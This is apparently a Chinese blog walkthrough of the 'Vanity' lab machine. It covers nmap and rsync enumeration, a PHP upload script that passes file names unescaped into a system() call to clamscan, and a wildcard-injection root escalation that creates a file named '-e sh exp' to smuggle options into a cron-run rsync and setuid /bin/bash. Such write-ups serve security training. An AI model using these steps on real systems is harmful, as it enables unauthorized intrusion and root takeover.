首页 > 其他分享 >Vanity Intermediate 统配符提权

Vanity Intermediate 统配符提权

时间:2024-11-09 14:46:09浏览次数:5  
标签:11 rsync 符提权 -- 31 36 192.168 统配 Intermediate

nmap扫描
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.167.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:00 (0:00:00 remaining)
Nmap scan report for 192.168.167.234
Host is up (0.072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vanity Virus Scanner
|_http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/9%OT=22%CT=1%CU=43814%PV=Y%DS=4%DC=T%G=Y%TM=672E
OS:DE5A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O
OS:1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11N
OS:W7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=9655%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT      ADDRESS
1   69.74 ms 192.168.45.1
2   69.54 ms 192.168.45.254
3   71.50 ms 192.168.251.1
4   71.55 ms 192.168.167.234

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.89 seconds


rsync查看源码
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234
source          Web Source
backup          Virus Samples Backup
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source
drwxr-xr-x          4,096 2022/10/25 11:31:36 .
-rw-r--r--          2,814 2022/10/25 11:31:36 index.html
-rw-r--r--            155 2022/10/25 11:31:36 style.css
drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads
-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234 ./rsyn_shared
source          Web Source
backup          Virus Samples Backup
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa  pass
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source       
drwxr-xr-x          4,096 2022/10/25 11:31:36 .
-rw-r--r--          2,814 2022/10/25 11:31:36 index.html
-rw-r--r--            155 2022/10/25 11:31:36 style.css
drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads
-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source/uploads/upload.php
-rw-r--r--            738 2022/10/25 11:31:36 upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─#  rsync  -av rsync://192.168.167.234/source/uploads/upload.php ./upload.php
receiving incremental file list
upload.php

sent 43 bytes  received 834 bytes  250.57 bytes/sec
total size is 738  speedup is 0.84
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa  pass  upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# cat upload.php     
<?php

        //Check if the file is well uploaded
        if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }


        //Set up valid extension
        $extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');

        $extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;

        //Check if the uploaded file extension is allowed

        if (in_array($extUpload, $extsNotAllowed) ) { 
        echo 'File not allowed'; 

        } 
    else {
        $name = "{$_FILES['file']['name']}";
        $result = move_uploaded_file($_FILES['file']['tmp_name'], $name);
        if($result){
            system("/usr/bin/clamscan $name");
        }
    }

?>                                                                                                                                                    

发现命令执行漏洞getshell

image
pspy32发现会执行rsync命令定时任务,存在通配符提权
image

image

利用通配符提权
www-data@vanity:/var/www/html/uploads$ rm *
www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > exp
www-data@vanity:/var/www/html/uploads$ chmod 777 *
www-data@vanity:/var/www/html/uploads$ echo > '-e sh exp'
www-data@vanity:/var/www/html/uploads$ ls

image

标签:11,rsync,符提权,--,31,36,192.168,统配,Intermediate
From: https://www.cnblogs.com/wssw/p/18536805

相关文章

  • 【系统配置】命令行配置麒麟安全中心应用程序来源检查
    原文链接:【系统配置】命令行配置麒麟安全中心应用程序来源检查Hello,大家好啊!今天带来一篇关于如何通过命令行配置麒麟系统安全中心应用程序来源检查的文章。应用程序来源检查是系统安全管理中的重要功能之一,它可以帮助用户识别并阻止不安全的软件来源,确保系统的可靠性和安......
  • 【EI复现】参与调峰的储能系统配置方案及经济性分析(Matlab代码实现)
    ......
  • efk日志收集系统配置模板
    一、被收集日志端服务器的配置:1. docker-compose.yaml的配置:#version:'2'services:filebeat:image:docker.elastic.co/beats/filebeat:8.10.2container_name:filebeatnetworks:-loggingvolumes:-./filebeat/filebeat.yml:/usr/share/filebe......
  • windows系统配置nginx环境运行pbootcms访问首页直接404的问题
    问题描述客户在安装PbootCMS后,访问后台 /admin.php 正常,但直接访问首页或其他页面时出现404错误。运行环境为Windows+Nginx+PHP。详细经过伪静态规则问题:客户反映伪静态规则一直无法生效。代码放到服务器后,除了后台 /admin.php 可以访问,其他页面均返回404......
  • k8s-Longhorn系统配置 20241017 -分布式存储
    目录一Longhorn存储部署1.1Longhorn概述1.2Longhorn部署1.5动态sc创建1.6测试PV及PVC1.7Ingress暴露Longhorn1.8确认验证附加Helm部署附0.1helm安装附0.2helm安装 回到顶部一Longhorn存储部署1.1Longhorn概述Longhorn是用于Kubernetes的......
  • k8s-NFS系统配置 20241017
    1、NFS服务端安装-master节点192.168.177.133#安装nfs服务端yuminstallnfs-utils-y#创建共享目录mkdir/nfs#配置nfs共享vim/etc/exports#添加以下一行/nfs*(rw,sync,no_root_squash)#指明共享目录和权限设置 #启动nfs服务,并设置开机启动systemctlstartnfs-ser......
  • k8s-NFS系统配置
    k8s-NFS系统配置NFS(networkfilesystem),nfs文件系统在k8s中主要用于持久化存储,可以被多个pod访问和共享数据。特点数据持久性nfs为k8s的pod提供了一种持久化数据的方式,即使pod被删除,数据也不会丢失,这是因为数据存在nfs服务器上,并不是存在pod上。资源共享nfs系统的文件可以......
  • cisco nexus7000 基本系统配置及OTV
    cisconexus7000基本系统配置1.开启cdpcdpenablecdpformatdevice-idsystem-name默认是对端设备的设备名2.ntp开启普通vdc2下开启ntp同步,先在defaultvdc上打上clockprotocolntpvdc2DC1-N7K-2(config)#ntpserver10.1.1.1use-vrfmannagementDC1-N7K-2(config)#ntpso......
  • windows系统配置nginx环境运行pbootcms访问首页直接404的问题
    在PbootCMS安装过程中遇到访问首页和其他页面返回404错误的问题,特别是在Windows+Nginx+PHP的环境下,确实需要仔细排查。根据你的描述,填写授权码后问题得到了解决,但仍然需要了解具体原因和解决方案。问题分析伪静态规则未生效:伪静态规则未正确生效可能导致访问首页和其他......
  • CMPINF 0401 Intermediate Programming
    CMPINF0401IntermediateProgrammingAssignment1Topics:Reviewofexpressions,conditions,loopsandI/OOnline:Wednesday,September4,2024Due:Allsource(.java)filesandacompletedAssignmentInformationSheetzippedintoasinglefileandsubmit......